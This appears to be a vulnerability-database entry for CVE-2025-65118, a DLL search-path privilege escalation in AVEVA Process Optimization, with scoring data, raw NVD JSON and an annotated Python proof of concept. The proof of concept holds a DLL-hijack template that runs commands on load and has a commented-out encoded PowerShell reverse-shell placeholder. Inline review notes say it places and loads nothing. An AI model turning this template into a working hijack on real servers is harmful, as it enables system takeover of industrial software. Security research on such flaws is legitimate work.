Security Vulnerability Report
CVE-2025-65118 CVSS 8.8 HIGH

CVE-2025-65118

Published: 2026-01-16 02:16:46
Last Modified: 2026-01-22 15:13:00

Description

The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to trick Process Optimization services into loading arbitrary code and escalate privileges to OS System, potentially resulting in complete compromise of the Model Application Server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE
AVEVA Process Optimization < fixed version (the CPE match in the raw JSON below gives versionEndExcluding 2025)
AVEVA Model Application Server — affected versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65118 PoC - Local Privilege Escalation in AVEVA Process Optimization
# This PoC demonstrates the privilege escalation attack vector
#
# NOTE(review): read literally, this script does three observable things:
#   1. writes a block of C source text into a file named 'malicious.dll' in the
#      current working directory (no compiler is invoked, nothing is loaded);
#   2. runs `whoami` once and applies a substring heuristic to its output;
#   3. prints a sequence of status lines.
# The file-placement step is commented out and the "trigger" step is print-only,
# so the script never touches the product's install path or its services. Treat
# it as an illustration of the CWE-427 (uncontrolled search path element) weakness
# class named in the NVD record on this page, not as evidence of exploitability.
# `sys`, `ctypes` and `wintypes` are imported but never referenced below.
import os
import sys
import ctypes
import subprocess
from ctypes import wintypes


def create_malicious_dll():
    """Generate malicious DLL that will execute with System privileges

    What this actually does: writes the text of ``dll_template`` verbatim to
    ``malicious.dll`` in the current working directory (text mode, so newline
    translation applies on Windows). The doubled ``{{``/``}}`` braces are never
    passed through ``str.format``, so they are written literally and the output
    is not valid C source. No build or load step exists in this function.
    """
    dll_template = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {{
    if (fdwReason == DLL_PROCESS_ATTACH) {{
        // Execute payload with System privileges
        // In real attack, this would be malicious code
        system("cmd.exe /c whoami > C:\\\\temp\\\\priv_esc_result.txt");
        // Create reverse shell or execute arbitrary commands
        // system("powershell -enc <encoded_command>");
    }}
    return TRUE;
}}
'''
    # Plain text write under a .dll filename; a defender seeing this artefact on
    # disk should not assume it is a loadable PE image.
    with open('malicious.dll', 'w') as f:
        f.write(dll_template)
    print('[+] Malicious DLL created')


def check_current_privileges():
    """Check current user privileges

    Runs ``whoami`` and returns ``True`` unless its stdout contains the
    substring ``'Administrator'`` or ``'SYSTEM'``. This is a name heuristic,
    not a token/privilege query: it does not look at group membership or
    integrity level, and any account name containing either substring is
    classified as high-privilege. ``result.returncode`` is not checked, so a
    failed ``whoami`` (empty stdout) is reported as a low-privilege user.
    """
    result = subprocess.run(['whoami'], capture_output=True, text=True)
    current_user = result.stdout.strip()
    print(f'[*] Current user: {current_user}')
    # Check if low-privilege user
    # Case-sensitive substring match on the raw whoami output.
    if 'Administrator' in current_user or 'SYSTEM' in current_user:
        print('[!] Already running as high-privilege user')
        return False
    return True


def exploit_privilege_escalation():
    """Attempt to exploit CVE-2025-65118

    Returns ``False`` only when ``check_current_privileges`` reports an
    already-privileged account. Otherwise it writes the template file, prints
    the intended target path, prints the "trigger" message and returns
    ``True`` unconditionally — the return value does not indicate that any
    DLL was placed or loaded, because neither action is performed here.
    """
    print('[*] Starting CVE-2025-65118 exploitation...')
    if not check_current_privileges():
        print('[-] Exploitation not needed - already privileged')
        return False
    # Step 1: Create malicious DLL
    create_malicious_dll()
    # Step 2: Place DLL in service load path
    # `service_path` is a hard-coded guess at the install directory; nothing
    # below verifies that the path exists or is writable by the current user.
    service_path = 'C:\\\\Program Files\\\\AVEVA\\\\Process Optimization\\\\'
    dll_target = os.path.join(service_path, 'malicious.dll')
    try:
        # In real attack, this would use path traversal or DLL hijacking
        # os.rename('malicious.dll', dll_target)
        # Only print() calls remain inside the try, so the except branch is
        # effectively unreachable: no file is moved and no error is produced.
        print(f'[*] Attempting to place DLL at: {dll_target}')
        print('[*] Note: This requires specific conditions (path traversal, misconfiguration)')
    except Exception as e:
        print(f'[-] Failed to place DLL: {e}')
    # Step 3: Trigger service to load the DLL
    # Print-only; no service control or process interaction happens here.
    print('[*] Triggering Process Optimization service to load malicious DLL')
    # In real attack: service restart or specific trigger
    print('[*] If successful, check C:\\temp\\priv_esc_result.txt')
    return True


if __name__ == '__main__':
    print('CVE-2025-65118 AVEVA Process Optimization LPE PoC')
    print('=' * 60)
    # Exit status is not derived from the return value; the script always
    # exits 0 unless whoami itself cannot be spawned.
    exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65118", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:46.003", "lastModified": "2026-01-22T15:13:00.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(OS Standard User) to trick Process Optimization services into loading \narbitrary code and escalate privileges to OS System, potentially \nresulting in complete compromise of the Model Application Server."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar del SO) engañar a los servicios de Optimización de Procesos para que carguen código arbitrario y escalar privilegios a Sistema del SO, lo que podría resultar en un compromiso completo del servidor de aplicaciones del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}